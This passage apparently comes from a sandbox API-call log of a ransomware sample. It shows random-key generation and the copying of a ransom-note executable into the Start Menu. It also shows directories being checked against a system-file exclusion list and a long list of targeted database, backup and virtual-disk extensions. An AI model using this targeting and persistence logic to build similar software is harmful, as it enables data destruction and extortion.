[0092.138] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.138] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.138] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.138] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.138] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.139] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x15c [0092.139] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x190000 [0092.139] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.140] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.140] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.140] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.140] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.141] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.141] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.141] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.141] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.141] CloseHandle (hObject=0x15c) returned 1 [0092.141] CloseHandle (hObject=0x118) returned 1 [0092.142] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.142] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.142] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.142] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d0c5c00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0092.142] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0092.142] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0c5c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 1 [0092.142] lstrcmpiW (lpString1="Programs", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.142] lstrcmpiW (lpString1="Programs", lpString2="aoldtz.exe") returned 1 [0092.142] lstrcmpiW (lpString1="Programs", lpString2=".") returned 1 [0092.142] lstrcmpiW (lpString1="Programs", lpString2="..") returned 1 [0092.142] lstrcmpiW (lpString1="Programs", lpString2="windows") returned -1 [0092.142] lstrcmpiW (lpString1="Programs", lpString2="bootmgr") returned 1 [0092.142] lstrcmpiW (lpString1="Programs", lpString2="temp") returned -1 [0092.142] lstrcmpiW (lpString1="Programs", lpString2="pagefile.sys") returned 1 [0092.142] lstrcmpiW (lpString1="Programs", lpString2="boot") returned 1 [0092.142] lstrcmpiW (lpString1="Programs", lpString2="ids.txt") returned 1 [0092.142] lstrcmpiW (lpString1="Programs", lpString2="ntuser.dat") returned 1 [0092.142] lstrcmpiW (lpString1="Programs", lpString2="perflogs") returned 1 [0092.142] lstrcmpiW (lpString1="Programs", lpString2="MSBuild") returned 1 [0092.142] lstrlenW (lpString="Programs") returned 8 [0092.142] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\desktop.ini") returned 52 [0092.143] lstrcpyW (in: lpString1=0x2cce452, lpString2="Programs" | out: lpString1="Programs") returned="Programs" [0092.143] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0092.143] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x64) returned 0x2e4710 [0092.143] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0092.143] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0c5c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 0 [0092.143] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0092.143] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0092.143] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs" [0092.143] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0092.143] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0092.143] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs") returned 49 [0092.143] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs" [0092.143] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0092.143] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0092.144] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0092.144] GetLastError () returned 0x0 [0092.144] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0092.144] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0092.144] CloseHandle (hObject=0x120) returned 1 [0092.144] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0092.144] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0092.144] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0c5c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0092.144] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.144] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0092.144] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0092.144] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0c5c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.144] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.144] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0092.144] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0092.144] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0092.144] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0ebd60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0ebd60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1 [0092.144] lstrcmpiW (lpString1="Accessories", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.144] lstrcmpiW (lpString1="Accessories", lpString2="aoldtz.exe") returned -1 [0092.144] lstrcmpiW (lpString1="Accessories", lpString2=".") returned 1 [0092.145] lstrcmpiW (lpString1="Accessories", lpString2="..") returned 1 [0092.145] lstrcmpiW (lpString1="Accessories", lpString2="windows") returned -1 [0092.145] lstrcmpiW (lpString1="Accessories", lpString2="bootmgr") returned -1 [0092.145] lstrcmpiW (lpString1="Accessories", lpString2="temp") returned -1 [0092.145] lstrcmpiW (lpString1="Accessories", lpString2="pagefile.sys") returned -1 [0092.145] lstrcmpiW (lpString1="Accessories", lpString2="boot") returned -1 [0092.145] lstrcmpiW (lpString1="Accessories", lpString2="ids.txt") returned -1 [0092.145] lstrcmpiW (lpString1="Accessories", lpString2="ntuser.dat") returned -1 [0092.145] lstrcmpiW (lpString1="Accessories", lpString2="perflogs") returned -1 [0092.145] lstrcmpiW (lpString1="Accessories", lpString2="MSBuild") returned -1 [0092.145] lstrlenW (lpString="Accessories") returned 11 [0092.145] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\*") returned 51 [0092.145] lstrcpyW (in: lpString1=0x2cce464, lpString2="Accessories" | out: lpString1="Accessories") returned="Accessories" [0092.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0092.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f00d8 [0092.145] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0092.145] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0ebd60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0ebd60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrative Tools", cAlternateFileName="ADMINI~1")) returned 1 [0092.145] lstrcmpiW (lpString1="Administrative Tools", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.145] lstrcmpiW (lpString1="Administrative Tools", lpString2="aoldtz.exe") returned -1 [0092.145] lstrcmpiW (lpString1="Administrative Tools", lpString2=".") returned 1 [0092.145] lstrcmpiW (lpString1="Administrative Tools", lpString2="..") returned 1 [0092.145] lstrcmpiW (lpString1="Administrative Tools", lpString2="windows") returned -1 [0092.145] lstrcmpiW (lpString1="Administrative Tools", lpString2="bootmgr") returned -1 [0092.145] lstrcmpiW (lpString1="Administrative Tools", lpString2="temp") returned -1 [0092.145] lstrcmpiW (lpString1="Administrative Tools", lpString2="pagefile.sys") returned -1 [0092.145] lstrcmpiW (lpString1="Administrative Tools", lpString2="boot") returned -1 [0092.145] lstrcmpiW (lpString1="Administrative Tools", lpString2="ids.txt") returned -1 [0092.145] lstrcmpiW (lpString1="Administrative Tools", lpString2="ntuser.dat") returned -1 [0092.145] lstrcmpiW (lpString1="Administrative Tools", lpString2="perflogs") returned -1 [0092.145] lstrcmpiW (lpString1="Administrative Tools", lpString2="MSBuild") returned -1 [0092.145] lstrlenW (lpString="Administrative Tools") returned 20 [0092.145] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories") returned 61 [0092.145] lstrcpyW (in: lpString1=0x2cce464, lpString2="Administrative Tools" | out: lpString1="Administrative Tools") returned="Administrative Tools" [0092.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0092.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8e) returned 0x320fc8 [0092.145] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0092.146] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0092.146] lstrlenW (lpString="desktop.ini") returned 11 [0092.146] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Administrative Tools") returned 70 [0092.146] lstrcpyW (in: lpString1=0x2cce464, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0092.146] lstrlenW (lpString="desktop.ini") returned 11 [0092.146] lstrlenW (lpString="Ares865") returned 7 [0092.146] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0092.146] lstrlenW (lpString=".dll") returned 4 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0092.146] lstrlenW (lpString=".lnk") returned 4 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0092.146] lstrlenW (lpString=".ini") returned 4 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0092.146] lstrlenW (lpString=".sys") returned 4 [0092.146] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0092.146] lstrlenW (lpString="desktop.ini") returned 11 [0092.146] lstrlenW (lpString="bak") returned 3 [0092.146] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0092.146] lstrlenW (lpString="ba_") returned 3 [0092.146] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0092.146] lstrlenW (lpString="dbb") returned 3 [0092.146] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0092.146] lstrlenW (lpString="vmdk") returned 4 [0092.146] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0092.146] lstrlenW (lpString="rar") returned 3 [0092.147] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0092.147] lstrlenW (lpString="zip") returned 3 [0092.147] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0092.147] lstrlenW (lpString="tgz") returned 3 [0092.147] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0092.147] lstrlenW (lpString="vbox") returned 4 [0092.147] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0092.147] lstrlenW (lpString="vdi") returned 3 [0092.147] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0092.147] lstrlenW (lpString="vhd") returned 3 [0092.147] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0092.147] lstrlenW (lpString="vhdx") returned 4 [0092.147] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0092.147] lstrlenW (lpString="avhd") returned 4 [0092.147] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0092.147] lstrlenW (lpString="db") returned 2 [0092.147] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0092.147] lstrlenW (lpString="db2") returned 3 [0092.147] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0092.147] lstrlenW (lpString="db3") returned 3 [0092.147] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0092.147] lstrlenW (lpString="dbf") returned 3 [0092.147] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0092.147] lstrlenW (lpString="mdf") returned 3 [0092.147] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0092.147] lstrlenW (lpString="mdb") returned 3 [0092.147] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0092.147] lstrlenW (lpString="sql") returned 3 [0092.147] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0092.147] lstrlenW (lpString="sqlite") returned 6 [0092.147] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0092.147] lstrlenW (lpString="sqlite3") returned 7 [0092.147] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0092.147] lstrlenW (lpString="sqlitedb") returned 8 [0092.147] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0092.147] lstrlenW (lpString="xml") returned 3 [0092.147] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0092.148] lstrlenW (lpString="$er") returned 3 [0092.148] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0092.148] lstrlenW (lpString="4dd") returned 3 [0092.148] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0092.148] lstrlenW (lpString="4dl") returned 3 [0092.148] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0092.148] lstrlenW (lpString="^^^") returned 3 [0092.148] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0092.148] lstrlenW (lpString="abs") returned 3 [0092.148] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0092.148] lstrlenW (lpString="abx") returned 3 [0092.148] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0092.148] lstrlenW (lpString="accdb") returned 5 [0092.148] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0092.148] lstrlenW (lpString="accdc") returned 5 [0092.148] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0092.148] lstrlenW (lpString="accde") returned 5 [0092.148] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0092.148] lstrlenW (lpString="accdr") returned 5 [0092.148] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0092.148] lstrlenW (lpString="accdt") returned 5 [0092.148] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0092.148] lstrlenW (lpString="accdw") returned 5 [0092.148] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0092.148] lstrlenW (lpString="accft") returned 5 [0092.148] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0092.148] lstrlenW (lpString="adb") returned 3 [0092.148] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.148] lstrlenW (lpString="adb") returned 3 [0092.148] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.148] lstrlenW (lpString="ade") returned 3 [0092.148] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0092.148] lstrlenW (lpString="adf") returned 3 [0092.148] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0092.148] lstrlenW (lpString="adn") returned 3 [0092.148] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0092.148] lstrlenW (lpString="adp") returned 3 [0092.148] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0092.149] lstrlenW (lpString="alf") returned 3 [0092.149] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0092.149] lstrlenW (lpString="ask") returned 3 [0092.149] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0092.149] lstrlenW (lpString="btr") returned 3 [0092.149] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0092.149] lstrlenW (lpString="cat") returned 3 [0092.149] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0092.149] lstrlenW (lpString="cdb") returned 3 [0092.149] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0092.149] lstrlenW (lpString="ckp") returned 3 [0092.149] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0092.149] lstrlenW (lpString="cma") returned 3 [0092.149] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0092.149] lstrlenW (lpString="cpd") returned 3 [0092.149] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0092.149] lstrlenW (lpString="dacpac") returned 6 [0092.149] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0092.149] lstrlenW (lpString="dad") returned 3 [0092.149] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0092.149] lstrlenW (lpString="dadiagrams") returned 10 [0092.149] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0092.149] lstrlenW (lpString="daschema") returned 8 [0092.149] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0092.149] lstrlenW (lpString="db-journal") returned 10 [0092.149] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0092.149] lstrlenW (lpString="db-shm") returned 6 [0092.149] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0092.149] lstrlenW (lpString="db-wal") returned 6 [0092.149] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0092.149] lstrlenW (lpString="dbc") returned 3 [0092.149] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0092.149] lstrlenW (lpString="dbs") returned 3 [0092.149] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0092.149] lstrlenW (lpString="dbt") returned 3 [0092.149] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0092.149] lstrlenW (lpString="dbv") returned 3 [0092.149] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0092.149] lstrlenW (lpString="dbx") returned 3 [0092.150] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0092.150] lstrlenW (lpString="dcb") returned 3 [0092.150] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0092.150] lstrlenW (lpString="dct") returned 3 [0092.150] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0092.150] lstrlenW (lpString="dcx") returned 3 [0092.150] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0092.150] lstrlenW (lpString="ddl") returned 3 [0092.150] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0092.150] lstrlenW (lpString="dlis") returned 4 [0092.150] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0092.150] lstrlenW (lpString="dp1") returned 3 [0092.150] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0092.150] lstrlenW (lpString="dqy") returned 3 [0092.150] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0092.150] lstrlenW (lpString="dsk") returned 3 [0092.150] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0092.150] lstrlenW (lpString="dsn") returned 3 [0092.150] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0092.150] lstrlenW (lpString="dtsx") returned 4 [0092.150] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0092.150] lstrlenW (lpString="dxl") returned 3 [0092.150] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0092.150] lstrlenW (lpString="eco") returned 3 [0092.150] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0092.150] lstrlenW (lpString="ecx") returned 3 [0092.150] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0092.150] lstrlenW (lpString="edb") returned 3 [0092.150] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0092.150] lstrlenW (lpString="epim") returned 4 [0092.150] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0092.150] lstrlenW (lpString="fcd") returned 3 [0092.150] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0092.150] lstrlenW (lpString="fdb") returned 3 [0092.150] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 